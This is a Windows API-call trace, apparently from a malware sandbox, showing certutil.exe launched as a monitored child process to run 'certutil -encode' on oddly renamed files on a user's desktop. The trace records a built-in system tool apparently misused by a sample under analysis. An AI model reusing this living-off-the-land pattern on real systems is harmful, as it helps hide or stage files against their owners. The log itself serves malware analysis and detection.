0x1 [0248.796] NtdllDefWindowProc_W () returned 0x0 [0248.806] UpdateWindow (hWnd=0x2402be) returned 1 [0248.806] PostMessageW (hWnd=0x2402be, Msg=0x400, wParam=0x0, lParam=0x2a83f0e217e) returned 1 [0248.806] GetMessageW (in: lpMsg=0xee95d9f630, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xee95d9f630) returned 1 [0248.806] TranslateMessage (lpMsg=0xee95d9f630) returned 0 [0248.806] DispatchMessageW (lpMsg=0xee95d9f630) returned 0x0 [0248.806] NtdllDefWindowProc_W () returned 0x0 [0248.806] GetMessageW (in: lpMsg=0xee95d9f630, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xee95d9f630) returned 1 [0248.806] TranslateMessage (lpMsg=0xee95d9f630) returned 0 [0248.807] DispatchMessageW (lpMsg=0xee95d9f630) returned 0x0 [0248.807] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x2a83f0e84f0 [0248.807] LocalAlloc (uFlags=0x0, uBytes=0x6e) returned 0x2a83f0eae40 [0248.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0248.807] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0248.807] SetLastError (dwErrCode=0x80070716) [0248.807] _vsnwprintf (in: _Buffer=0xee95d9f038, _BufferCount=0xb, _Format="%d", _ArgList=0xee95d9f028 | out: _Buffer="465") returned 3 [0248.807] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xee95d9edf0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0248.807] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x2a83f0f44c0 [0248.807] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0248.807] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0248.808] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xee95d9edd0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0248.808] GetLastError () returned 0xcb [0248.808] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0248.808] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0248.808] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0248.808] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0248.808] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0248.808] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0248.808] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0248.808] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0248.808] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0248.808] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0248.808] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0248.808] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0248.808] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0248.808] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0248.808] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0248.808] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0248.809] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0248.809] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0248.809] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0248.809] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0248.809] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0248.809] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xee95d9ea98 | out: phkResult=0xee95d9ea98*=0x23c) returned 0x0 [0248.809] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x2a83f0e9320 [0248.809] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xee95d9f008, lpData=0xee95d9f038, lpcbData=0xee95d9f000*=0x4 | out: lpType=0xee95d9f008*=0x0, lpData=0xee95d9f038*=0x0, lpcbData=0xee95d9f000*=0x4) returned 0x2 [0248.809] LocalFree (hMem=0x2a83f0e9320) returned 0x0 [0248.809] RegCloseKey (hKey=0x23c) returned 0x0 [0248.809] LocalFree (hMem=0x0) returned 0x0 [0248.809] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2a83f10e090 [0248.873] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0248.873] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0248.874] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0248.874] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0248.874] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2a83f10d1f0 [0248.874] GetComputerNameW (in: lpBuffer=0x2a83f10d1f0, nSize=0xee95d9f000 | out: lpBuffer="NQDPDE", nSize=0xee95d9f000) returned 1 [0248.875] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0xee95d9efd0 | out: lpBuffer=0x0, nSize=0xee95d9efd0) returned 0 [0248.875] GetLastError () returned 0xea [0248.875] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x2a83f0fb780 [0248.875] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x2a83f0fb780, nSize=0xee95d9efd0 | out: lpBuffer="NQdPdE", nSize=0xee95d9efd0) returned 1 [0248.875] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0248.913] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x2a83f1129c0, cbCertEncoded=0x90da) returned 0x0 [0248.916] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x2a83f1129c0, cbCrlEncoded=0x90da) returned 0x0 [0248.916] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x2a83f1129c0, cbEncoded=0x90da, dwFlags=0x8000, pDecodePara=0xee95d9eeb0, pvStructInfo=0xee95d9ef40, pcbStructInfo=0xee95d9ef34 | out: pvStructInfo=0xee95d9ef40, pcbStructInfo=0xee95d9ef34) returned 0 [0248.916] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x2a83f1129c0, cbEncoded=0x90da, dwFlags=0x8000, pDecodePara=0xee95d9eeb0, pvStructInfo=0xee95d9ef40, pcbStructInfo=0xee95d9ef34 | out: pvStructInfo=0xee95d9ef40, pcbStructInfo=0xee95d9ef34) returned 0 [0248.916] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x2a83f1129c0, cbEncoded=0x90da, dwFlags=0x8000, pDecodePara=0xee95d9eeb0, pvStructInfo=0xee95d9ef40, pcbStructInfo=0xee95d9ef34 | out: pvStructInfo=0xee95d9ef40, pcbStructInfo=0xee95d9ef34) returned 0 [0248.916] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x2a83f0f2c30 [0248.926] CryptMsgUpdate (hCryptMsg=0x2a83f0f2c30, pbData=0x2a83f1129c0, cbData=0x90da, fFinal=1) returned 0 [0248.926] GetLastError () returned 0x8009310b [0248.926] CryptMsgClose (hCryptMsg=0x2a83f0f2c30) returned 1 [0248.926] GetFileAttributesExW (in: lpFileName="rBP 3.rtf.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\rbp 3.rtf.sister"), fInfoLevelId=0x0, lpFileInformation=0xee95d9ef60 | out: lpFileInformation=0xee95d9ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c334170, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0x4fecbaf0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x4fecbaf0, ftLastWriteTime.dwHighDateTime=0x1d5e39e, nFileSizeHigh=0x0, nFileSizeLow=0x90da)) returned 1 [0248.926] _vsnwprintf (in: _Buffer=0xee95d9ef68, _BufferCount=0xb, _Format="%d", _ArgList=0xee95d9ef58 | out: _Buffer="359") returned 3 [0248.926] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0xee95d9ed20, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0248.926] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2a83f10d100 [0248.926] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0248.926] _vsnwprintf (in: _Buffer=0xee95d9df50, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0xee95d9efa8 | out: _Buffer="Input Length = 37082") returned 20 [0248.926] GetFileType (hFile=0x50) returned 0x2 [0248.926] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xee95d9df50*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0xee95d9df04, lpReserved=0x0 | out: lpBuffer=0xee95d9df50*, lpNumberOfCharsWritten=0xee95d9df04*=0x14) returned 1 [0249.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.035] _vsnwprintf (in: _Buffer=0xee95d9df50, _BufferCount=0x1ff, _Format="\n", _ArgList=0xee95d9efa8 | out: _Buffer="\n") returned 1 [0249.035] GetFileType (hFile=0x50) returned 0x2 [0249.035] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xee95d9df50*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xee95d9df04, lpReserved=0x0 | out: lpBuffer=0xee95d9df50*, lpNumberOfCharsWritten=0xee95d9df04*=0x1) returned 1 [0249.200] GetFileAttributesExW (in: lpFileName="rBP 3.rtf.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\rbp 3.rtf.cruel"), fInfoLevelId=0x0, lpFileInformation=0xee95d9ef60 | out: lpFileInformation=0xee95d9ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf17bfc9, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xbf17bfc9, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xbf1ec5ba, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xc766)) returned 1 [0249.200] _vsnwprintf (in: _Buffer=0xee95d9ef68, _BufferCount=0xb, _Format="%d", _ArgList=0xee95d9ef58 | out: _Buffer="361") returned 3 [0249.200] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0xee95d9ed20, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0249.200] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x2a83f10cd70 [0249.200] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.200] _vsnwprintf (in: _Buffer=0xee95d9df50, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0xee95d9efa8 | out: _Buffer="Output Length = 51046") returned 21 [0249.200] GetFileType (hFile=0x50) returned 0x2 [0249.200] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xee95d9df50*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0xee95d9df04, lpReserved=0x0 | out: lpBuffer=0xee95d9df50*, lpNumberOfCharsWritten=0xee95d9df04*=0x15) returned 1 [0249.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.271] _vsnwprintf (in: _Buffer=0xee95d9df50, _BufferCount=0x1ff, _Format="\n", _ArgList=0xee95d9efa8 | out: _Buffer="\n") returned 1 [0249.271] GetFileType (hFile=0x50) returned 0x2 [0249.271] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xee95d9df50*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xee95d9df04, lpReserved=0x0 | out: lpBuffer=0xee95d9df50*, lpNumberOfCharsWritten=0xee95d9df04*=0x1) returned 1 [0249.429] LocalFree (hMem=0x2a83f1129c0) returned 0x0 [0249.430] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0249.430] _vsnwprintf (in: _Buffer=0xee95d9efc8, _BufferCount=0xb, _Format="%d", _ArgList=0xee95d9efb8 | out: _Buffer="2022") returned 4 [0249.430] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0xee95d9ed80, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0249.430] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x2a83f0e8730 [0249.430] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.430] _vsnwprintf (in: _Buffer=0xee95d9dfb0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0xee95d9f008 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0249.430] GetFileType (hFile=0x50) returned 0x2 [0249.430] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xee95d9dfb0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0xee95d9df64, lpReserved=0x0 | out: lpBuffer=0xee95d9dfb0*, lpNumberOfCharsWritten=0xee95d9df64*=0x31) returned 1 [0249.450] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.450] _vsnwprintf (in: _Buffer=0xee95d9dfb0, _BufferCount=0x1ff, _Format="\n", _ArgList=0xee95d9f008 | out: _Buffer="\n") returned 1 [0249.450] GetFileType (hFile=0x50) returned 0x2 [0249.450] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0xee95d9dfb0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xee95d9df64, lpReserved=0x0 | out: lpBuffer=0xee95d9dfb0*, lpNumberOfCharsWritten=0xee95d9df64*=0x1) returned 1 [0249.502] LocalFree (hMem=0x0) returned 0x0 [0249.502] LocalFree (hMem=0x2a83f0eae40) returned 0x0 [0249.502] LocalFree (hMem=0x2a83f0e84f0) returned 0x0 [0249.502] SetLastError (dwErrCode=0x80070716) [0249.502] _vsnwprintf (in: _Buffer=0xee95d9f038, _BufferCount=0xb, _Format="%d", _ArgList=0xee95d9f028 | out: _Buffer="511") returned 3 [0249.503] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0xee95d9edf0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0249.503] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x2a83f10d070 [0249.503] PostQuitMessage (nExitCode=0) [0249.503] GetMessageW (in: lpMsg=0xee95d9f630, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xee95d9f630) returned 0 [0249.503] LocalFree (hMem=0x2a83f0fb780) returned 0x0 [0249.503] LocalFree (hMem=0x2a83f10d1f0) returned 0x0 [0249.503] LocalFree (hMem=0x0) returned 0x0 [0249.504] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0249.504] GetLastError () returned 0x7e [0249.504] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0249.505] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0249.505] DllMain () returned 0x1 [0249.505] LocalFree (hMem=0x2a83f0fb620) returned 0x0 [0249.505] LocalFree (hMem=0x2a83f0f44c0) returned 0x0 [0249.505] LocalFree (hMem=0x2a83f10d100) returned 0x0 [0249.505] LocalFree (hMem=0x2a83f10cd70) returned 0x0 [0249.505] LocalFree (hMem=0x2a83f0e8730) returned 0x0 [0249.505] LocalFree (hMem=0x2a83f10d070) returned 0x0 [0249.505] LocalFree (hMem=0x2a83f0f1c70) returned 0x0 [0249.505] LocalFree (hMem=0x2a83f0f4430) returned 0x0 [0249.505] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0249.505] GetLastError () returned 0x7e [0249.505] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0249.506] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0249.506] DllMain () returned 0x1 [0249.506] exit (_Code=0) Thread: id = 77 os_tid = 0x1180 Process: id = "28" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x2284b000" os_pid = "0x100c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 78 os_tid = 0xee0 [0249.811] GetStartupInfoW (in: lpStartupInfo=0x947fabf700 | out: lpStartupInfo=0x947fabf700*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0249.816] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0249.817] __set_app_type (_Type=0x1) [0249.817] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0249.817] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0249.820] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0249.820] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0249.820] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0249.820] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0249.820] WerSetFlags () returned 0x0 [0249.821] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0249.821] __iob_func () returned 0x7ffcea2dea00 [0249.821] _fileno (_File=0x7ffcea2dea30) returned 1 [0249.821] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0249.821] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0249.823] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0249.823] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0249.823] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0249.823] GetConsoleOutputCP () returned 0x1b5 [0249.824] _vsnwprintf (in: _Buffer=0x947fabf670, _BufferCount=0xb, _Format=".%d", _ArgList=0x947fabf598 | out: _Buffer=".437") returned 4 [0249.824] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0249.824] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0249.824] GetFileType (hFile=0x50) returned 0x2 [0249.824] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0249.825] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0249.825] SetThreadUILanguage (LangId=0x0) returned 0x409 [0249.825] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0249.825] GetCommandLineW () returned="certutil -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\"" [0249.825] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1d633b4b9c0 [0249.826] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1d633b3cf90 [0249.826] LocalFree (hMem=0x1d633b4b9c0) returned 0x0 [0249.826] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1d633b3c190 [0249.826] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1d633b3bc80 [0249.826] LocalFree (hMem=0x1d633b3c190) returned 0x0 [0249.826] LocalFree (hMem=0x1d633b3cf90) returned 0x0 [0249.826] LocalFree (hMem=0x0) returned 0x0 [0249.826] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0249.826] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0249.827] GetCommandLineW () returned="certutil -encode \"rcZz1_vwUIy4k7qcs3.mp3.Sister\" \"rcZz1_vwUIy4k7qcs3.mp3.Cruel\"" [0249.827] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1d633b4bc00 [0249.827] GetSystemTime (in: lpSystemTime=0x947fabf360 | out: lpSystemTime=0x947fabf360*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x18, wMilliseconds=0x16f)) [0249.827] SystemTimeToFileTime (in: lpSystemTime=0x947fabf360, lpFileTime=0x947fabf358 | out: lpFileTime=0x947fabf358) returned 1 [0249.827] FileTimeToLocalFileTime (in: lpFileTime=0x947fabf358, lpLocalFileTime=0x947fabf320 | out: lpLocalFileTime=0x947fabf320) returned 1 [0249.827] FileTimeToSystemTime (in: lpFileTime=0x947fabf320, lpSystemTime=0x947fabf090 | out: lpSystemTime=0x947fabf090) returned 1 [0249.827] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x947fabf090, lpFormat=0x0, lpDateStr=0x947fabf1a0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0249.827] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x947fabf090, lpFormat=0x0, lpTimeStr=0x947fabf0a0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0249.827] _vsnwprintf (in: _Buffer=0x947fabf0ae, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x947fabf078 | out: _Buffer=" 24.367s") returned 8 [0249.827] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1d633b4e910 [0249.827] SetLastError (dwErrCode=0x80070716) [0249.828] _vsnwprintf (in: _Buffer=0x947fabf128, _BufferCount=0xb, _Format="%d", _ArgList=0x947fabf118 | out: _Buffer="948") returned 3 [0249.828] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x947fabeee0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0249.828] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1d633b4bb40 [0249.828] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1d633b550d0 [0249.828] LocalFree (hMem=0x1d633b4e910) returned 0x0 [0249.828] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x947fabf3d0 | out: lpSystemTimeAsFileTime=0x947fabf3d0*(dwLowDateTime=0xbf849bd1, dwHighDateTime=0x1d6141f)) [0249.828] GetLocalTime (in: lpSystemTime=0x947fabf408 | out: lpSystemTime=0x947fabf408*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x18, wMilliseconds=0x170)) [0249.828] SystemTimeToFileTime (in: lpSystemTime=0x947fabf408, lpFileTime=0x947fabf3e0 | out: lpFileTime=0x947fabf3e0) returned 1 [0249.828] CompareFileTime (lpFileTime1=0x947fabf3e0, lpFileTime2=0x947fabf3d0) returned 1 [0249.828] _vsnwprintf (in: _Buffer=0x947fabf418, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x947fabf3a8 | out: _Buffer="GMT + 2.00") returned 10 [0249.829] LocalFree (hMem=0x1d633b4bc00) returned 0x0 [0249.829] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0249.829] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0249.829] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0249.829] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0249.829] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0249.829] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x947fabf448 | out: _Buffer="10.0.15063.447") returned 14 [0249.829] GetACP () returned 0x4e4 [0249.829] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0249.829] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1d633b4b900 [0249.829] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1d633b4b900, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0249.829] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1d633b4e810 [0249.829] _vsnwprintf (in: _Buffer=0x1d633b4e810, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x947fabf498 | out: _Buffer="10.0.15063.447 retail") returned 21 [0249.829] LocalFree (hMem=0x1d633b4b900) returned 0x0 [0249.829] LocalFree (hMem=0x0) returned 0x0 [0249.830] 